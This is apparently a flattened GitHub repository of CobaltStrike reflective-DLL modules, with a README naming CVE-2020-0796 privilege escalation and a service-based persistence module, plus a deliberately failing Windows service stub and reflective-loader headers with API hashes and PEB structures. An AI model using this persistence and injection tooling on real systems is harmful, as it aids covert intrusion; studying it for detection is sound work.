233 | SystemCodeIntegritySyntheticCacheInformation = 209, 234 | MaxSystemInfoClass 235 | } SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS; 236 | 237 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth 238 | /* NOTE(review): the Windows SDK declares NTSTATUS as a signed LONG; with ULONG, a sign-based success test such as status >= 0 is always true — confirm how callers check it. */ 239 | typedef ULONG NTSTATUS; 240 | /* Function-pointer typedefs matching the ntdll exports of the same names; how they are resolved is not visible in this header. */ 241 | typedef NTSTATUS(WINAPI* fpRtlGetCompressionWorkSpaceSize)(USHORT, PULONG, PULONG); 242 | typedef NTSTATUS(WINAPI* fpRtlCompressBuffer)(USHORT, PUCHAR, ULONG, PUCHAR, ULONG, ULONG, PULONG, PVOID); 243 | typedef NTSTATUS(WINAPI* fpNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 244 | 245 | #endif -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/x64/Release/reflective_dll.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0796_CNA/x64/Release/reflective_dll.x64.dll -------------------------------------------------------------------------------- /ExitService/ExitService.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | /* Minimal Win32 service host. ServiceMain below registers a control handler and returns without ever reporting SERVICE_START_PENDING or SERVICE_RUNNING, so the Service Control Manager records the start as a failure; the README on this page describes the binary as a helper for the service start-failure callback. From the defender's side this shows up as a service-start failure in the System event log, and any program configured as the service's recovery action can be listed with sc qfailure <service name>. Both globals have static storage and are therefore zero-initialized; nothing here ever sets ServiceStatus.dwServiceType or dwControlsAccepted. */ SERVICE_STATUS ServiceStatus; 5 | SERVICE_STATUS_HANDLE hStatus; 6 | 7 | void ServiceMain(int argc, char** argv); 8 | void ControlHandler(DWORD request); 9 | /* Process entry: hands the main thread to the SCM via StartServiceCtrlDispatcher. "system manager" must equal the name the service was installed under or the SCM will not find ServiceMain; the (char*) cast only drops the literal's constness, and the LPSERVICE_MAIN_FUNCTION cast hides that ServiceMain is declared (int, char**) instead of (DWORD, LPTSTR*). The dispatcher's BOOL result is discarded, so running the executable outside the SCM exits 0 without any diagnostic. */ 10 | int main(int argc, _TCHAR* argv[]) 11 | { 12 | SERVICE_TABLE_ENTRY ServiceTable[2]; 13 | ServiceTable[0].lpServiceName = (char*)"system manager"; 14 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; 15 | ServiceTable[1].lpServiceName = NULL; 16 | ServiceTable[1].lpServiceProc = NULL; 17 | StartServiceCtrlDispatcher(ServiceTable); 18 | return 0; 19 | } 20 | /* Service entry. Registers the control handler and returns immediately; the handle is not checked for NULL and no status is ever reported, which is what makes the start fail. */ void ServiceMain(int argc, char** argv) 21 | { 22 | hStatus = RegisterServiceCtrlHandler("system manager", (LPHANDLER_FUNCTION)ControlHandler); 23 | return; 24 | } 25 | /* Control handler: every request (STOP, SHUTDOWN or anything else) reports SERVICE_STOPPED with the otherwise zero-initialized status block. dwWin32ExitCode = -1 stored into a DWORD becomes 0xFFFFFFFF; the SetServiceStatus/return after the switch are unreachable because every case returns. */ 26 | void ControlHandler(DWORD request) 27 | { 28 | switch (request) 29 | { 30 | case 
SERVICE_CONTROL_STOP: 31 | ServiceStatus.dwWin32ExitCode = 0; 32 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 33 | SetServiceStatus(hStatus, &ServiceStatus); 34 | return; 35 | 36 | case SERVICE_CONTROL_SHUTDOWN: 37 | ServiceStatus.dwWin32ExitCode = 0; 38 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 39 | SetServiceStatus(hStatus, &ServiceStatus); 40 | return; 41 | default: 42 | //Stop service 43 | ServiceStatus.dwWin32ExitCode = -1; 44 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 45 | SetServiceStatus(hStatus, &ServiceStatus); 46 | return; 47 | } 48 | /* unreachable: every case above returns */ SetServiceStatus(hStatus, &ServiceStatus); 49 | return; 50 | } 51 | -------------------------------------------------------------------------------- /ExitService/ExitService.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /ExitService/ExitService.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30907.101 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExitService", "ExitService.vcxproj", "{BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | 
GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x64.ActiveCfg = Debug|x64 17 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x64.Build.0 = Debug|x64 18 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x86.Build.0 = Debug|Win32 20 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x64.ActiveCfg = Release|x64 21 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x64.Build.0 = Release|x64 22 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x86.ActiveCfg = Release|Win32 23 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {A4CEABD9-6286-431D-A2CC-5B7353D313B8} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ExitService/ExitService.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ExitService/ExitService.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {bdc2a2b9-4702-412d-a804-f9c1e14c3dcd} 25 | ExitService 26 | 10.0 27 | ExitService 28 | 29 | 30 | 31 | Application 32 | true 33 | v142 34 | Unicode 35 | 36 | 37 | Application 38 | false 39 | v142 40 | true 41 | MultiByte 42 | 43 | 44 | Application 45 | true 46 | v142 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v142 53 | true 54 | MultiByte 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 
| 75 | true 76 | 77 | 78 | false 79 | false 80 | false 81 | 82 | 83 | true 84 | 85 | 86 | false 87 | false 88 | false 89 | 90 | 91 | 92 | Level3 93 | true 94 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | 97 | 98 | Console 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | true 106 | true 107 | true 108 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | MultiThreaded 111 | 112 | 113 | Console 114 | true 115 | true 116 | false 117 | NoErrorReport 118 | 119 | 120 | 121 | 122 | Level3 123 | true 124 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Console 129 | true 130 | 131 | 132 | 133 | 134 | Level3 135 | true 136 | true 137 | true 138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | true 140 | MultiThreaded 141 | 142 | 143 | Console 144 | true 145 | true 146 | false 147 | NoErrorReport 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /ExitService/ExitService.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CobaltStrike Reflective Dll Source 2 | 3 | ### CVE-2020-0787_CNA 4 | CVE-2020-0787回显 5 | 6 | ### CVE-2020-0796_CNA 7 | 8 | CVE-2020-0796提权 9 | 10 | ### ExitService 11 | 12 | 一个在启动后会返回失败的服务程序,用于启动失败回调方式执行命令。 13 | 14 | ### Service_Reflective_dll 15 | 16 | 使用系统服务进行权限维持的反射DLL模块,支持中文服务名、描述;支持设置SDDL;支持设置服务启动方式(自启、手动、触发、启动失败回调)。 17 | -------------------------------------------------------------------------------- /Service_Reflective_dll/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Service_Reflective_dll/Release/readme.md: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/Release/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/bin/readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/bin/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/Release/readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/dll/Release/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 13 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 14 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 15 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | 
GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 31 | reflective_dll 32 | Win32Proj 33 | 34 | 35 | 36 | DynamicLibrary 37 | v142 38 | MultiByte 39 | true 40 | 41 | 42 | DynamicLibrary 43 | v142 44 | MultiByte 45 | true 46 | 47 | 48 | DynamicLibrary 49 | v142 50 | Unicode 51 | 52 | 53 | DynamicLibrary 54 | v142 55 | Unicode 56 | 57 | 58 | DynamicLibrary 59 | v142 60 | MultiByte 61 | false 62 | 63 | 64 | DynamicLibrary 65 | v142 66 | Unicode 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | <_ProjectFileVersion>11.0.50727.1 92 | 93 | 94 | 
$(SolutionDir)$(Configuration)\ 95 | $(Configuration)\ 96 | true 97 | 98 | 99 | true 100 | 101 | 102 | $(SolutionDir)$(Platform)\$(Configuration)\ 103 | $(Platform)\$(Configuration)\ 104 | true 105 | 106 | 107 | $(SolutionDir)$(Configuration)\ 108 | $(Configuration)\ 109 | false 110 | false 111 | 112 | 113 | false 114 | 115 | 116 | $(SolutionDir)$(Platform)\$(Configuration)\ 117 | $(Platform)\$(Configuration)\ 118 | false 119 | 120 | 121 | 122 | Disabled 123 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 124 | true 125 | EnableFastChecks 126 | MultiThreadedDebugDLL 127 | 128 | Level3 129 | EditAndContinue 130 | 131 | 132 | true 133 | Windows 134 | MachineX86 135 | 136 | 137 | 138 | 139 | Disabled 140 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 141 | true 142 | EnableFastChecks 143 | MultiThreadedDebugDLL 144 | 145 | 146 | Level3 147 | EditAndContinue 148 | 149 | 150 | true 151 | Windows 152 | 153 | 154 | 155 | 156 | X64 157 | 158 | 159 | Disabled 160 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 161 | true 162 | EnableFastChecks 163 | MultiThreadedDebugDLL 164 | 165 | Level3 166 | ProgramDatabase 167 | 168 | 169 | true 170 | Windows 171 | MachineX64 172 | 173 | 174 | 175 | 176 | MaxSpeed 177 | OnlyExplicitInline 178 | true 179 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 180 | MultiThreaded 181 | true 182 | 183 | Level3 184 | ProgramDatabase 185 | 186 | 187 | false 188 | Windows 189 | true 190 | true 191 | MachineX86 192 | 193 | 194 | copy ..\Release\reflective_dll.dll ..\bin\ 195 | 196 | 197 | 198 | 199 | MinSpace 200 | OnlyExplicitInline 201 | true 202 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 203 | 
MultiThreaded 204 | true 205 | 206 | 207 | Level3 208 | ProgramDatabase 209 | true 210 | Default 211 | 212 | 213 | true 214 | Windows 215 | true 216 | true 217 | $(OutDir)$(ProjectName).arm.dll 218 | 219 | 220 | copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\ 221 | 222 | 223 | 224 | 225 | X64 226 | 227 | 228 | MaxSpeed 229 | OnlyExplicitInline 230 | true 231 | Size 232 | false 233 | WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 234 | MultiThreaded 235 | true 236 | 237 | Level3 238 | ProgramDatabase 239 | CompileAsCpp 240 | D:\ActivePart\Code\VS2019\CobaltStrike_script\Persistence\WinServices\CreateService_DLL\dll\src;%(AdditionalIncludeDirectories) 241 | 242 | 243 | $(OutDir)$(ProjectName).x64.dll 244 | true 245 | Windows 246 | true 247 | true 248 | MachineX64 249 | 250 | 251 | copy $(OutDir)$(ProjectName).x64.dll ..\bin\ 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveDLLInjection.h: 
-------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | /* NOTE(review): the include target above was stripped by the page rendering. */ 34 | // we declare some common stuff in here... 35 | /* Non-standard DllMain reason code (the documented values are 0..3, DLL_PROCESS_DETACH through DLL_THREAD_DETACH); presumably used by the custom DllMain in ReflectiveDll.c, not shown here — confirm. */ 36 | #define DLL_QUERY_HMODULE 6 37 | /* Unchecked typed reads through an arbitrary address: plain casts with no alignment or bounds checking, so every use relies on the caller having already validated the address. */ 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | /* Raw function-pointer types for the exported loader entry (no arguments, returns a pointer-sized value) and for a DllMain. */ 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveDll.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/dll/src/ReflectiveDll.c -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 
4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | #include 34 | #include 35 | /* NOTE(review): the three include targets above were stripped by the page rendering. */ 36 | #include "ReflectiveDLLInjection.h" 37 | /* Function-pointer types for the four imports the loader needs before it has a working import table; presumably resolved by matching hash() of export names against the *_HASH constants below (the resolving code is in ReflectiveLoader.c, not shown here). */ 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); 40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); 41 | typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); 42 | /* Precomputed hash() values for two module names and four export names. They are fixed literals, so they double as a cheap static signature for this loader family; defenders commonly match on them. */ 43 | #define KERNEL32DLL_HASH 0x6A4ABC5B 44 | #define NTDLLDLL_HASH 0x3CFA685D 45 | 46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 48 | #define VIRTUALALLOC_HASH 0x91AFCA54 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 50 | /* ARM MOVW/MOVT base-relocation type values and instruction masks; the relocation code that uses them is not in this header. */ 51 | #define IMAGE_REL_BASED_ARM_MOV32A 5 52 | #define IMAGE_REL_BASED_ARM_MOV32T 7 53 | 54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000) 55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) 56 | #define ARM_MOVW 0xF2400000 57 | #define ARM_MOVT 0xF2C00000 58 | /* Rotation count used by ror()/hash(); changing it invalidates every *_HASH constant above. */ 59 | #define HASH_KEY 13 60 | //===============================================================================================// 61 | #pragma intrinsic( _rotr ) 62 | /* Rotates d right by HASH_KEY bits using the compiler intrinsic. */ 63 | __forceinline DWORD ror( DWORD d ) 64 | { 65 | return _rotr( d, HASH_KEY ); 66 | } 67 | /* Rotate-and-add hash of a NUL-terminated string: for every byte, h = ror(h) + byte. The do/while consumes the first character before testing the terminator, so a zero-length input reads one byte past its NUL; callers are expected to pass non-empty names. char is signed by default on MSVC, so bytes >= 0x80 are sign-extended before the add, and the precomputed constants above depend on that. Returns the 32-bit hash. */ 68 | __forceinline DWORD hash( char * c ) 69 | { 70 | register DWORD h = 0; 71 | do 72 | { 73 | h = ror( h ); 74 | h += *c; 75 | } while( *++c ); 76 | 77 | return h; 78 | } 79 | //===============================================================================================// 80 | /* Mirror of ntdll's UNICODE_STRING (Length and MaximumLength are byte counts in the documented structure); presumably declared locally to avoid depending on winternl.h. */ typedef struct _UNICODE_STR 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR pBuffer; 85 | } UNICODE_STR, *PUNICODE_STR; 86 | 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY 88 | 
//__declspec( align(8) ) 89 | /* Hand-declared view of ntdll's loader entry, deliberately offset by one LIST_ENTRY (see the commented-out InLoadOrderLinks): an entry is reached through its InMemoryOrderModuleList link, so that link is the first field here. NOTE(review): the tail of the real structure varies between Windows versions — treat offsets past BaseDllName as unverified. */ typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | /* Loader data reached through _PEB.pLdr; the three list heads are presumably what the loader walks to enumerate loaded modules (walking code not shown here). */ 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | /* Partial copy of the undocumented PEB. NOTE(review): the "0x210 bytes" annotation and the DWORD-width fields after pLdr match a 32-bit layout; on x64 only the leading pointer-aligned fields (through pLdr and the next few LPVOIDs) can be expected to line up, so nothing beyond them should be relied on without checking the target build. */ 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | 